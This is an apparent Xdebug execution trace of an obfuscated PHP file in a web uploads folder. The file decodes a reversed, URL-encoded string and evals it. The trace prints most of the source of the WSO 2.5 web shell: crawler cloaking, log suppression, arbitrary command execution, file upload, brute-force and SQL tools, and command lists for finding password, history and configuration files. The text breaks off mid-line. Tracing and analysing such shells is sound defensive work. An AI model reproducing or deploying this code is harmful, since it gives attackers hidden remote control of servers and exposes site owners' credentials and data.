Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 00:32:56.690903]
1	0	1	0.000149	393528
1	3	0	0.000619	509560	{main}	1		/var/www/html/uploads/00977a.php	0	0
2	4	0	0.000637	509560	error_reporting	0		/var/www/html/uploads/00977a.php	2	1	0
2	4	1	0.000652	509600
2	4	R			0
2	5	0	0.000665	509560	set_time_limit	0		/var/www/html/uploads/00977a.php	2	1	0
2	5	1	0.000680	509624
2	5	R			FALSE
1		A						/var/www/html/uploads/00977a.php	3	$code = '%3Btixe%0D%0A%3B%29%5D%27a%27%5BTSOP_%24+.+%27noitca%27%28cnuf_resu_llac%09%0D%0A%29+%29%5D%27a%27%5BTSOP_%24+.+%27noitca%27%28stsixe_noitcnuf+%26%26+%29%5D%27a%27%5BTSOP_%24%28ytpme%21+%28fi%0D%0A%3B%27ofnIceS%27+%3D+%5D%27a%27%5BTSOP_%24%09%09%0D%0Aesle%09%0D%0A%3Bnoitca_tluafed%24+%3D+%5D%27a%27%5BTSOP_%24%09%09%0D%0A%29%29noitca_tluafed%24+.+%27noitca%27%28stsixe_noitcnuf+%26%26+%29noitca_tluafed%24%28tessi%28fi%09%0D%0A%29+%29%5D%27a%27%5BTSOP_%24%28ytpme+%28fi%0D%0A%7D%0D%0A%7D%09%0D%0A%3B%29%5D%271p%'
2	6	0	0.000786	509592	urldecode	0		/var/www/html/uploads/00977a.php	4	1	'%3Btixe%0D%0A%3B%29%5D%27a%27%5BTSOP_%24+.+%27noitca%27%28cnuf_resu_llac%09%0D%0A%29+%29%5D%27a%27%5BTSOP_%24+.+%27noitca%27%28stsixe_noitcnuf+%26%26+%29%5D%27a%27%5BTSOP_%24%28ytpme%21+%28fi%0D%0A%3B%27ofnIceS%27+%3D+%5D%27a%27%5BTSOP_%24%09%09%0D%0Aesle%09%0D%0A%3Bnoitca_tluafed%24+%3D+%5D%27a%27%5BTSOP_%24%09%09%0D%0A%29%29noitca_tluafed%24+.+%27noitca%27%28stsixe_noitcnuf+%26%26+%29noitca_tluafed%24%28tessi%28fi%09%0D%0A%29+%29%5D%27a%27%5BTSOP_%24%28ytpme+%28fi%0D%0A%7D%0D%0A%7D%09%0D%0A%3B%29%5D%271p%'
2	6	1	0.001713	624312
2	6	R			';tixe\r\n;)]\'a\'[TSOP_$ . \'noitca\'(cnuf_resu_llac\t\r\n) )]\'a\'[TSOP_$ . \'noitca\'(stsixe_noitcnuf && )]\'a\'[TSOP_$(ytpme! (fi\r\n;\'ofnIceS\' = ]\'a\'[TSOP_$\t\t\r\nesle\t\r\n;noitca_tluafed$ = ]\'a\'[TSOP_$\t\t\r\n))noitca_tluafed$ . \'noitca\'(stsixe_noitcnuf && )noitca_tluafed$(tessi(fi\t\r\n) )]\'a\'[TSOP_$(ytpme (fi\r\n}\r\n}\t\r\n;)]\'1p\'[TSOP_$(lave\t\t\r\n{ esle }\t\r\n;)a$(ezilaires ohce\t\t\r\n;)\t\t\r\n)\'edom_efas\'(teg_ini@ >= "edomefas"\t\t\t\r\n,NOISREV_OSW >= "noisrev_osw"\t\t\t\r\n,'
1		A						/var/www/html/uploads/00977a.php	4	$code = ';tixe\r\n;)]\'a\'[TSOP_$ . \'noitca\'(cnuf_resu_llac\t\r\n) )]\'a\'[TSOP_$ . \'noitca\'(stsixe_noitcnuf && )]\'a\'[TSOP_$(ytpme! (fi\r\n;\'ofnIceS\' = ]\'a\'[TSOP_$\t\t\r\nesle\t\r\n;noitca_tluafed$ = ]\'a\'[TSOP_$\t\t\r\n))noitca_tluafed$ . \'noitca\'(stsixe_noitcnuf && )noitca_tluafed$(tessi(fi\t\r\n) )]\'a\'[TSOP_$(ytpme (fi\r\n}\r\n}\t\r\n;)]\'1p\'[TSOP_$(lave\t\t\r\n{ esle }\t\r\n;)a$(ezilaires ohce\t\t\r\n;)\t\t\r\n)\'edom_efas\'(teg_ini@ >= "edomefas"\t\t\t\r\n,NOISREV_OSW >= "noisrev_osw"\t\t\t\r\n,'
2	7	0	0.002032	624280	strrev	0		/var/www/html/uploads/00977a.php	4	1	';tixe\r\n;)]\'a\'[TSOP_$ . \'noitca\'(cnuf_resu_llac\t\r\n) )]\'a\'[TSOP_$ . \'noitca\'(stsixe_noitcnuf && )]\'a\'[TSOP_$(ytpme! (fi\r\n;\'ofnIceS\' = ]\'a\'[TSOP_$\t\t\r\nesle\t\r\n;noitca_tluafed$ = ]\'a\'[TSOP_$\t\t\r\n))noitca_tluafed$ . \'noitca\'(stsixe_noitcnuf && )noitca_tluafed$(tessi(fi\t\r\n) )]\'a\'[TSOP_$(ytpme (fi\r\n}\r\n}\t\r\n;)]\'1p\'[TSOP_$(lave\t\t\r\n{ esle }\t\r\n;)a$(ezilaires ohce\t\t\r\n;)\t\t\r\n)\'edom_efas\'(teg_ini@ >= "edomefas"\t\t\t\r\n,NOISREV_OSW >= "noisrev_osw"\t\t\t\r\n,'
2	7	1	0.002206	693944
2	7	R			'$auth_pass = "";\n\r$color = "#df5";\n\r$default_action = \'FilesMan\';\n\r$default_use_ajax = true;\n\r$default_charset = \'Windows-1251\';\n\r\n\rif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\n\r    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\n\r    if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\n\r        header(\'HTTP/1.0 404 Not Found\');\n\r        exit;\n\r    }\n\r}\n\r\n\r@ini_set(\'error_log\',NULL);\n\r@ini_set'
1		A						/var/www/html/uploads/00977a.php	4	$code = '$auth_pass = "";\n\r$color = "#df5";\n\r$default_action = \'FilesMan\';\n\r$default_use_ajax = true;\n\r$default_charset = \'Windows-1251\';\n\r\n\rif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\n\r    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\n\r    if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\n\r        header(\'HTTP/1.0 404 Not Found\');\n\r        exit;\n\r    }\n\r}\n\r\n\r@ini_set(\'error_log\',NULL);\n\r@ini_set'
2	8	0	0.004654	1143112	eval	1	'$auth_pass = "";\n\r$color = "#df5";\n\r$default_action = \'FilesMan\';\n\r$default_use_ajax = true;\n\r$default_charset = \'Windows-1251\';\n\r\n\rif(!empty($_SERVER[\'HTTP_USER_AGENT\'])) {\n\r    $userAgents = array("Google", "Slurp", "MSNBot", "ia_archiver", "Yandex", "Rambler");\n\r    if(preg_match(\'/\' . implode(\'|\', $userAgents) . \'/i\', $_SERVER[\'HTTP_USER_AGENT\'])) {\n\r        header(\'HTTP/1.0 404 Not Found\');\n\r        exit;\n\r    }\n\r}\n\r\n\r@ini_set(\'error_log\',NULL);\n\r@ini_set(\'log_errors\',0);\n\r@ini_set(\'max_execution_time\',0);\n\r@set_time_limit(0);\n\r@define(\'WSO_VERSION\', \'2.5\');\n\r\n\rif(get_magic_quotes_gpc()) {\n\r\tfunction WSOstripslashes($array) {\n\r\t\treturn is_array($array) ? array_map(\'WSOstripslashes\', $array) : stripslashes($array);\n\r\t}\n\r\t$_POST = WSOstripslashes($_POST);\n\r    $_COOKIE = WSOstripslashes($_COOKIE);\n\r}\n\r\n\rfunction wsoLogin() {\n\r\tdie("<pre align=center><form method=post>Password: <input type=password name=pass><input type=submit value=\'>>\'></form></pre>");\n\r}\n\r\n\rfunction WSOsetcookie($k, $v) {\n\r    $_COOKIE[$k] = $v;\n\r    setcookie($k, $v);\n\r}\n\r\n\rif(!empty($auth_pass)) {\n\r    if(isset($_POST[\'pass\']) && (md5($_POST[\'pass\']) == $auth_pass))\n\r        WSOsetcookie(md5($_SERVER[\'HTTP_HOST\']), $auth_pass);\n\r\n\r    if (!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])]) || ($_COOKIE[md5($_SERVER[\'HTTP_HOST\'])] != $auth_pass))\n\r        wsoLogin();\n\r}\n\r\n\rif(strtolower(substr(PHP_OS,0,3)) == "win")\n\r\t$os = \'win\';\n\relse\n\r\t$os = \'nix\';\n\r\n\r$safe_mode = @ini_get(\'safe_mode\');\n\rif(!$safe_mode)\n\r    error_reporting(0);\n\r\n\r$disable_functions = @ini_get(\'disable_functions\');\n\r$home_cwd = @getcwd();\n\rif(isset($_POST[\'c\']))\n\r\t@chdir($_POST[\'c\']);\n\r$cwd = @getcwd();\n\rif($os == \'win\') {\n\r\t$home_cwd = str_replace("\\\\", "/", $home_cwd);\n\r\t$cwd = str_replace("\\\\", "/", $cwd);\n\r}\n\rif($cwd[strlen($cwd)-1] != \'/\')\n\r\t$cwd .= \'/\';\n\r\n\rif(!isset($_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\']))\n\r    $_COOKIE[md5($_SERVER[\'HTTP_HOST\']) . \'ajax\'] = (bool)$default_use_ajax;\n\r\n\rif($os == \'win\')\n\r\t$aliases = array(\n\r\t\t"List Directory" => "dir",\n\r    \t"Find index.php in current dir" => "dir /s /w /b index.php",\n\r    \t"Find *config*.php in current dir" => "dir /s /w /b *config*.php",\n\r    \t"Show active connections" => "netstat -an",\n\r    \t"Show running services" => "net start",\n\r    \t"User accounts" => "net user",\n\r    \t"Show computers" => "net view",\n\r\t\t"ARP Table" => "arp -a",\n\r\t\t"IP Configuration" => "ipconfig /all"\n\r\t);\n\relse\n\r\t$aliases = array(\n\r  \t\t"List dir" => "ls -lha",\n\r\t\t"list file attributes on a Linux second extended file system" => "lsattr -va",\n\r  \t\t"show opened ports" => "netstat -an | grep -i listen",\n\r        "process status" => "ps aux",\n\r\t\t"Find" => "",\n\r  \t\t"find all suid files" => "find / -type f -perm -04000 -ls",\n\r  \t\t"find suid files in current dir" => "find . -type f -perm -04000 -ls",\n\r  \t\t"find all sgid files" => "find / -type f -perm -02000 -ls",\n\r  \t\t"find sgid files in current dir" => "find . -type f -perm -02000 -ls",\n\r  \t\t"find config.inc.php files" => "find / -type f -name config.inc.php",\n\r  \t\t"find config* files" => "find / -type f -name \\"config*\\"",\n\r  \t\t"find config* files in current dir" => "find . -type f -name \\"config*\\"",\n\r  \t\t"find all writable folders and files" => "find / -perm -2 -ls",\n\r  \t\t"find all writable folders and files in current dir" => "find . -perm -2 -ls",\n\r  \t\t"find all service.pwd files" => "find / -type f -name service.pwd",\n\r  \t\t"find service.pwd files in current dir" => "find . -type f -name service.pwd",\n\r  \t\t"find all .htpasswd files" => "find / -type f -name .htpasswd",\n\r  \t\t"find .htpasswd files in current dir" => "find . -type f -name .htpasswd",\n\r  \t\t"find all .bash_history files" => "find / -type f -name .bash_history",\n\r  \t\t"find .bash_history files in current dir" => "find . -type f -name .bash_history",\n\r  \t\t"find all .fetchmailrc files" => "find / -type f -name .fetchmailrc",\n\r  \t\t"find .fetchmailrc files in current dir" => "find . -type f -name .fetchmailrc",\n\r\t\t"Locate" => "",\n\r  \t\t"locate httpd.conf files" => "locate httpd.conf",\n\r\t\t"locate vhosts.conf files" => "locate vhosts.conf",\n\r\t\t"locate proftpd.conf files" => "locate proftpd.conf",\n\r\t\t"locate psybnc.conf files" => "locate psybnc.conf",\n\r\t\t"locate my.conf files" => "locate my.conf",\n\r\t\t"locate admin.php files" =>"locate admin.php",\n\r\t\t"locate cfg.php files" => "locate cfg.php",\n\r\t\t"locate conf.php files" => "locate conf.php",\n\r\t\t"locate config.dat files" => "locate config.dat",\n\r\t\t"locate config.php files" => "locate config.php",\n\r\t\t"locate config.inc files" => "locate config.inc",\n\r\t\t"locate config.inc.php" => "locate config.inc.php",\n\r\t\t"locate config.default.php files" => "locate config.default.php",\n\r\t\t"locate config* files " => "locate config",\n\r\t\t"locate .conf files"=>"locate \'.conf\'",\n\r\t\t"locate .pwd files" => "locate \'.pwd\'",\n\r\t\t"locate .sql files" => "locate \'.sql\'",\n\r\t\t"locate .htpasswd files" => "locate \'.htpasswd\'",\n\r\t\t"locate .bash_history files" => "locate \'.bash_history\'",\n\r\t\t"locate .mysql_history files" => "locate \'.mysql_history\'",\n\r\t\t"locate .fetchmailrc files" => "locate \'.fetchmailrc\'",\n\r\t\t"locate backup files" => "locate backup",\n\r\t\t"locate dump files" => "locate dump",\n\r\t\t"locate priv files" => "locate priv"\n\r\t);\n\r\n\rfunction wsoHeader() {\n\r\tif(empty($_POST[\'charset\']))\n\r\t\t$_POST[\'charset\'] = $GLOBALS[\'default_charset\'];\n\r\tglobal $color;\n\r\techo "<html><head><meta http-equiv=\'Content-Type\' content=\'text/html; charset=" . $_POST[\'charset\'] . "\'><title>" . $_SERVER[\'HTTP_HOST\'] . " - WSO " . WSO_VERSION ."</title>\n\r<style>\n\rbody{background-color:#444;color:#e1e1e1;}\n\rbody,td,th{ font: 9pt Lucida,Verdana;margin:0;vertical-align:top;color:#e1e1e1; }\n\rtable.info{ color:#fff;background-color:#222; }\n\rspan,h1,a{ color: $color !important; }\n\rspan{ font-weight: bolder; }\n\rh1{ border-left:5px solid $color;padding: 2px 5px;font: 14pt Verdana;background-color:#222;margin:0px; }\n\rdiv.content{ padding: 5px;margin-left:5px;background-color:#333; }\n\ra{ text-decoration:none; }\n\ra:hover{ text-decoration:underline; }\n\r.ml1{ border:1px solid #444;padding:5px;margin:0;overflow: auto; }\n\r.bigarea{ width:100%;height:300px; }\n\rinput,textarea,select{ margin:0;color:#fff;background-color:#555;border:1px solid $color; font: 9pt Monospace,\'Courier New\'; }\n\rform{ margin:0px; }\n\r#toolsTbl{ text-align:center; }\n\r.toolsInp{ width: 300px }\n\r.main th{text-align:left;background-color:#5e5e5e;}\n\r.main tr:hover{background-color:#5e5e5e}\n\r.l1{background-color:#444}\n\r.l2{background-color:#333}\n\rpre{font-family:Courier,Monospace;}\n\r</style>\n\r<script>\n\r    var c_ = \'" . htmlspecialchars($GLOBALS[\'cwd\']) . "\';\n\r    var a_ = \'" . htmlspecialchars(@$_POST[\'a\']) ."\'\n\r    var charset_ = \'" . htmlspecialchars(@$_POST[\'charset\']) ."\';\n\r    var p1_ = \'" . ((strpos(@$_POST[\'p1\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p1\'],ENT_QUOTES)) ."\';\n\r    var p2_ = \'" . ((strpos(@$_POST[\'p2\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p2\'],ENT_QUOTES)) ."\';\n\r    var p3_ = \'" . ((strpos(@$_POST[\'p3\'],"\\n")!==false)?\'\':htmlspecialchars($_POST[\'p3\'],ENT_QUOTES)) ."\';\n\r    var d = document;\n\r\tfunction set(a,c,p1,p2,p3,charset) {\n\r\t\tif(a!=null)d.mf.a.value=a;else d.mf.a.value=a_;\n\r\t\tif(c!=null)d.mf.c.value=c;else d.mf.c.value=c_;\n\r\t\tif(p1!=null)d.mf.p1.value=p1;else d.mf.p1.value=p1_;\n\r\t\tif(p2!=null)d.mf.p2.value=p2;else d.mf.p2.value=p2_;\n\r\t\tif(p3!=null)d.mf.p3.value=p3;else d.mf.p3.value=p3_;\n\r\t\tif(charset!=null)d.mf.charset.value=charset;else d.mf.charset.value=charset_;\n\r\t}\n\r\tfunction g(a,c,p1,p2,p3,charset) {\n\r\t\tset(a,c,p1,p2,p3,charset);\n\r\t\td.mf.submit();\n\r\t}\n\r\tfunction a(a,c,p1,p2,p3,charset) {\n\r\t\tset(a,c,p1,p2,p3,charset);\n\r\t\tvar params = \'ajax=true\';\n\r\t\tfor(i=0;i<d.mf.elements.length;i++)\n\r\t\t\tparams += \'&\'+d.mf.elements[i].name+\'=\'+encodeURIComponent(d.mf.elements[i].value);\n\r\t\tsr(\'" . addslashes($_SERVER[\'REQUEST_URI\']) ."\', params);\n\r\t}\n\r\tfunction sr(url, params) {\n\r\t\tif (window.XMLHttpRequest)\n\r\t\t\treq = new XMLHttpRequest();\n\r\t\telse if (window.ActiveXObject)\n\r\t\t\treq = new ActiveXObject(\'Microsoft.XMLHTTP\');\n\r        if (req) {\n\r            req.onreadystatechange = processReqChange;\n\r            req.open(\'POST\', url, true);\n\r            req.setRequestHeader (\'Content-Type\', \'application/x-www-form-urlencoded\');\n\r            req.send(params);\n\r        }\n\r\t}\n\r\tfunction processReqChange() {\n\r\t\tif( (req.readyState == 4) )\n\r\t\t\tif(req.status == 200) {\n\r\t\t\t\tvar reg = new RegExp(\\"(\\\\\\\\d+)([\\\\\\\\S\\\\\\\\s]*)\\", \'m\');\n\r\t\t\t\tvar arr=reg.exec(req.responseText);\n\r\t\t\t\teval(arr[2].substr(0, arr[1]));\n\r\t\t\t} else alert(\'Request error!\');\n\r\t}\n\r</script>\n\r<head><body><div style=\'position:absolute;width:100%;background-color:#444;top:0;left:0;\'>\n\r<form method=post name=mf style=\'display:none;\'>\n\r<input type=hidden name=a>\n\r<input type=hidden name=c>\n\r<input type=hidden name=p1>\n\r<input type=hidden name=p2>\n\r<input type=hidden name=p3>\n\r<input type=hidden name=charset>\n\r</form>";\n\r\t$freeSpace = @diskfreespace($GLOBALS[\'cwd\']);\n\r\t$totalSpace = @disk_total_space($GLOBALS[\'cwd\']);\n\r\t$totalSpace = $totalSpace?$totalSpace:1;\n\r\t$release = @php_uname(\'r\');\n\r\t$kernel = @php_uname(\'s\');\n\r\t$explink = \'http://exploit-db.com/search/?action=search&filter_description=\';\n\r\tif(strpos(\'Linux\', $kernel) !== false)\n\r\t\t$explink .= urlencode(\'Linux Kernel \' . substr($release,0,6));\n\r\telse\n\r\t\t$explink .= urlencode($kernel . \' \' . substr($release,0,3));\n\r\tif(!function_exists(\'posix_getegid\')) {\n\r\t\t$user = @get_current_user();\n\r\t\t$uid = @getmyuid();\n\r\t\t$gid = @getmygid();\n\r\t\t$group = "?";\n\r\t} else {\n\r\t\t$uid = @posix_getpwuid(posix_geteuid());\n\r\t\t$gid = @posix_getgrgid(posix_getegid());\n\r\t\t$user = $uid[\'name\'];\n\r\t\t$uid = $uid[\'uid\'];\n\r\t\t$group = $gid[\'name\'];\n\r\t\t$gid = $gid[\'gid\'];\n\r\t}\n\r\n\r\t$cwd_links = \'\';\n\r\t$path = explode("/", $GLOBALS[\'cwd\']);\n\r\t$n=count($path);\n\r\tfor($i=0; $i<$n-1; $i++) {\n\r\t\t$cwd_links .= "<a href=\'#\' onclick=\'g(\\"FilesMan\\",\\"";\n\r\t\tfor($j=0; $j<=$i; $j++)\n\r\t\t\t$cwd_links .= $path[$j].\'/\';\n\r\t\t$cwd_links .= "\\")\'>".$path[$i]."/</a>";\n\r\t}\n\r\n\r\t$charsets = array(\'UTF-8\', \'Windows-1251\', \'KOI8-R\', \'KOI8-U\', \'cp866\');\n\r\t$opt_charsets = \'\';\n\r\tforeach($charsets as $item)\n\r\t\t$opt_charsets .= \'<option value="\'.$item.\'" \'.($_POST[\'charset\']==$item?\'selected\':\'\').\'>\'.$item.\'</option>\';\n\r\n\r\t$m = array(\'Sec. Info\'=>\'SecInfo\',\'Files\'=>\'FilesMan\',\'Console\'=>\'Console\',\'Sql\'=>\'Sql\',\'Php\'=>\'Php\',\'String tools\'=>\'StringTools\',\'Bruteforce\'=>\'Bruteforce\',\'Network\'=>\'Network\');\n\r\tif(!empty($GLOBALS[\'auth_pass\']))\n\r\t\t$m[\'Logout\'] = \'Logout\';\n\r\t$m[\'Self remove\'] = \'SelfRemove\';\n\r\t$menu = \'\';\n\r\tforeach($m as $k => $v)\n\r\t\t$menu .= \'<th width="\'.(int)(100/count($m)).\'%">[ <a href="#" onclick="g(\\\'\'.$v.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\')">\'.$k.\'</a> ]</th>\';\n\r\n\r\t$drives = "";\n\r\tif($GLOBALS[\'os\'] == \'win\') {\n\r\t\tforeach(range(\'c\',\'z\') as $drive)\n\r\t\tif(is_dir($drive.\':\\\\\'))\n\r\t\t\t$drives .= \'<a href="#" onclick="g(\\\'FilesMan\\\',\\\'\'.$drive.\':/\\\')">[ \'.$drive.\' ]</a> \';\n\r\t}\n\r\techo \'<table class=info cellpadding=3 cellspacing=0 width=100%><tr><td width=1><span>Uname:<br>User:<br>Php:<br>Hdd:<br>Cwd:\' . ($GLOBALS[\'os\'] == \'win\'?\'<br>Drives:\':\'\') . \'</span></td>\'\n\r       . \'<td><nobr>\' . substr(@php_uname(), 0, 120) . \' <a href="\' . $explink . \'" target=_blank>[exploit-db.com]</a></nobr><br>\' . $uid . \' ( \' . $user . \' ) <span>Group:</span> \' . $gid . \' ( \' . $group . \' )<br>\' . @phpversion() . \' <span>Safe mode:</span> \' . ($GLOBALS[\'safe_mode\']?\'<font color=red>ON</font>\':\'<font color=green><b>OFF</b></font>\')\n\r       . \' <a href=# onclick="g(\\\'Php\\\',null,\\\'\\\',\\\'info\\\')">[ phpinfo ]</a> <span>Datetime:</span> \' . date(\'Y-m-d H:i:s\') . \'<br>\' . wsoViewSize($totalSpace) . \' <span>Free:</span> \' . wsoViewSize($freeSpace) . \' (\'. (int) ($freeSpace/$totalSpace*100) . \'%)<br>\' . $cwd_links . \' \'. wsoPermsColor($GLOBALS[\'cwd\']) . \' <a href=# onclick="g(\\\'FilesMan\\\',\\\'\' . $GLOBALS[\'home_cwd\'] . \'\\\',\\\'\\\',\\\'\\\',\\\'\\\')">[ home ]</a><br>\' . $drives . \'</td>\'\n\r       . \'<td width=1 align=right><nobr><select onchange="g(null,null,null,null,null,this.value)"><optgroup label="Page charset">\' . $opt_charsets . \'</optgroup></select><br><span>Server IP:</span><br>\' . @$_SERVER["SERVER_ADDR"] . \'<br><span>Client IP:</span><br>\' . $_SERVER[\'REMOTE_ADDR\'] . \'</nobr></td></tr></table>\'\n\r       . \'<table style="border-top:2px solid #333;" cellpadding=3 cellspacing=0 width=100%><tr>\' . $menu . \'</tr></table><div style="margin:5">\';\n\r}\n\r\n\rfunction wsoFooter() {\n\r\t$is_writable = is_writable($GLOBALS[\'cwd\'])?" <font color=\'green\'>(Writeable)</font>":" <font color=red>(Not writable)</font>";\n\r    echo "\n\r</div>\n\r<table class=info id=toolsTbl cellpadding=3 cellspacing=0 width=100%  style=\'border-top:2px solid #333;border-bottom:2px solid #333;\'>\n\r\t<tr>\n\r\t\t<td><form onsubmit=\'g(null,this.c.value,\\"\\");return false;\'><span>Change dir:</span><br><input class=\'toolsInp\' type=text name=c value=\'" . htmlspecialchars($GLOBALS[\'cwd\']) ."\'><input type=submit value=\'>>\'></form></td>\n\r\t\t<td><form onsubmit=\\"g(\'FilesTools\',null,this.f.value);return false;\\"><span>Read file:</span><br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form></td>\n\r\t</tr><tr>\n\r\t\t<td><form onsubmit=\\"g(\'FilesMan\',null,\'mkdir\',this.d.value);return false;\\"><span>Make dir:</span>$is_writable<br><input class=\'toolsInp\' type=text name=d><input type=submit value=\'>>\'></form></td>\n\r\t\t<td><form onsubmit=\\"g(\'FilesTools\',null,this.f.value,\'mkfile\');return false;\\"><span>Make file:</span>$is_writable<br><input class=\'toolsInp\' type=text name=f><input type=submit value=\'>>\'></form></td>\n\r\t</tr><tr>\n\r\t\t<td><form onsubmit=\\"g(\'Console\',null,this.c.value);return false;\\"><span>Execute:</span><br><input class=\'toolsInp\' type=text name=c value=\'\'><input type=submit value=\'>>\'></form></td>\n\r\t\t<td><form method=\'post\' ENCTYPE=\'multipart/form-data\'>\n\r\t\t<input type=hidden name=a value=\'FilesMAn\'>\n\r\t\t<input type=hidden name=c value=\'" . $GLOBALS[\'cwd\'] ."\'>\n\r\t\t<input type=hidden name=p1 value=\'uploadFile\'>\n\r\t\t<input type=hidden name=charset value=\'" . (isset($_POST[\'charset\'])?$_POST[\'charset\']:\'\') . "\'>\n\r\t\t<span>Upload file:</span>$is_writable<br><input class=\'toolsInp\' type=file name=f><input type=submit value=\'>>\'></form><br  ></td>\n\r\t</tr></table></div></body></html>";\n\r}\n\r\n\rif (!function_exists("posix_getpwuid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getpwuid\')===false)) {\n\r    function posix_getpwuid($p) {return false;} }\n\rif (!function_exists("posix_getgrgid") && (strpos($GLOBALS[\'disable_functions\'], \'posix_getgrgid\')===false)) {\n\r    function posix_getgrgid($p) {return false;} }\n\r\n\rfunction wsoEx($in) {\n\r\t$out = \'\';\n\r\tif (function_exists(\'exec\')) {\n\r\t\t@exec($in,$out);\n\r\t\t$out = @join("\\n",$out);\n\r\t} elseif (function_exists(\'passthru\')) {\n\r\t\tob_start();\n\r\t\t@passthru($in);\n\r\t\t$out = ob_get_clean();\n\r\t} elseif (function_exists(\'system\')) {\n\r\t\tob_start();\n\r\t\t@system($in);\n\r\t\t$out = ob_get_clean();\n\r\t} elseif (function_exists(\'shell_exec\')) {\n\r\t\t$out = shell_exec($in);\n\r\t} elseif (is_resource($f = @popen($in,"r"))) {\n\r\t\t$out = "";\n\r\t\twhile(!@feof($f))\n\r\t\t\t$out .= fread($f,1024);\n\r\t\tpclose($f);\n\r\t}\n\r\treturn $out;\n\r}\n\r\n\rfunction wsoViewSize($s) {\n\r    if (is_int($s))\n\r        $s = sprintf("%u", $s);\n\r    \n\r\tif($s >= 1073741824)\n\r\t\treturn sprintf(\'%1.2f\', $s / 1073741824 ). \' GB\';\n\r\telseif($s >= 1048576)\n\r\t\treturn sprintf(\'%1.2f\', $s / 1048576 ) . \' MB\';\n\r\telseif($s >= 1024)\n\r\t\treturn sprintf(\'%1.2f\', $s / 1024 ) . \' KB\';\n\r\telse\n\r\t\treturn $s . \' B\';\n\r}\n\r\n\rfunction wsoPerms($p) {\n\r\tif (($p & 0xC000) == 0xC000)$i = \'s\';\n\r\telseif (($p & 0xA000) == 0xA000)$i = \'l\';\n\r\telseif (($p & 0x8000) == 0x8000)$i = \'-\';\n\r\telseif (($p & 0x6000) == 0x6000)$i = \'b\';\n\r\telseif (($p & 0x4000) == 0x4000)$i = \'d\';\n\r\telseif (($p & 0x2000) == 0x2000)$i = \'c\';\n\r\telseif (($p & 0x1000) == 0x1000)$i = \'p\';\n\r\telse $i = \'u\';\n\r\t$i .= (($p & 0x0100) ? \'r\' : \'-\');\n\r\t$i .= (($p & 0x0080) ? \'w\' : \'-\');\n\r\t$i .= (($p & 0x0040) ? (($p & 0x0800) ? \'s\' : \'x\' ) : (($p & 0x0800) ? \'S\' : \'-\'));\n\r\t$i .= (($p & 0x0020) ? \'r\' : \'-\');\n\r\t$i .= (($p & 0x0010) ? \'w\' : \'-\');\n\r\t$i .= (($p & 0x0008) ? (($p & 0x0400) ? \'s\' : \'x\' ) : (($p & 0x0400) ? \'S\' : \'-\'));\n\r\t$i .= (($p & 0x0004) ? \'r\' : \'-\');\n\r\t$i .= (($p & 0x0002) ? \'w\' : \'-\');\n\r\t$i .= (($p & 0x0001) ? (($p & 0x0200) ? \'t\' : \'x\' ) : (($p & 0x0200) ? \'T\' : \'-\'));\n\r\treturn $i;\n\r}\n\r\n\rfunction wsoPermsColor($f) {\n\r\tif (!@is_readable($f))\n\r\t\treturn \'<font color=#FF0000>\' . wsoPerms(@fileperms($f)) . \'</font>\';\n\r\telseif (!@is_writable($f))\n\r\t\treturn \'<font color=white>\' . wsoPerms(@fileperms($f)) . \'</font>\';\n\r\telse\n\r\t\treturn \'<font color=#25ff00>\' . wsoPerms(@fileperms($f)) . \'</font>\';\n\r}\n\r\n\rfunction wsoScandir($dir) {\n\r    if(function_exists("scandir")) {\n\r        return scandir($dir);\n\r    } else {\n\r        $dh  = opendir($dir);\n\r        while (false !== ($filename = readdir($dh)))\n\r            $files[] = $filename;\n\r        return $files;\n\r    }\n\r}\n\r\n\rfunction wsoWhich($p) {\n\r\t$path = wsoEx(\'which \' . $p);\n\r\tif(!empty($path))\n\r\t\treturn $path;\n\r\treturn false;\n\r}\n\r\n\rfunction actionSecInfo() {\n\r\twsoHeader();\n\r\techo \'<h1>Server security information</h1><div class=content>\';\n\r\tfunction wsoSecParam($n, $v) {\n\r\t\t$v = trim($v);\n\r\t\tif($v) {\n\r\t\t\techo \'<span>\' . $n . \': </span>\';\n\r\t\t\tif(strpos($v, "\\n") === false)\n\r\t\t\t\techo $v . \'<br>\';\n\r\t\t\telse\n\r\t\t\t\techo \'<pre class=ml1>\' . $v . \'</pre>\';\n\r\t\t}\n\r\t}\n\r\n\r\twsoSecParam(\'Server software\', @getenv(\'SERVER_SOFTWARE\'));\n\r    if(function_exists(\'apache_get_modules\'))\n\r        wsoSecParam(\'Loaded Apache modules\', implode(\', \', apache_get_modules()));\n\r\twsoSecParam(\'Disabled PHP Functions\', $GLOBALS[\'disable_functions\']?$GLOBALS[\'disable_functions\']:\'none\');\n\r\twsoSecParam(\'Open base dir\', @ini_get(\'open_basedir\'));\n\r\twsoSecParam(\'Safe mode exec dir\', @ini_get(\'safe_mode_exec_dir\'));\n\r\twsoSecParam(\'Safe mode include dir\', @ini_get(\'safe_mode_include_dir\'));\n\r\twsoSecParam(\'cURL support\', function_exists(\'curl_version\')?\'enabled\':\'no\');\n\r\t$temp=array();\n\r\tif(function_exists(\'mysql_get_client_info\'))\n\r\t\t$temp[] = "MySql (".mysql_get_client_info().")";\n\r\tif(function_exists(\'mssql_connect\'))\n\r\t\t$temp[] = "MSSQL";\n\r\tif(function_exists(\'pg_connect\'))\n\r\t\t$temp[] = "PostgreSQL";\n\r\tif(function_exists(\'oci_connect\'))\n\r\t\t$temp[] = "Oracle";\n\r\twsoSecParam(\'Supported databases\', implode(\', \', $temp));\n\r\techo \'<br>\';\n\r\n\r\tif($GLOBALS[\'os\'] == \'nix\') {\n\r            wsoSecParam(\'Readable /etc/passwd\', @is_readable(\'/etc/passwd\')?"yes <a href=\'#\' onclick=\'g(\\"FilesTools\\", \\"/etc/\\", 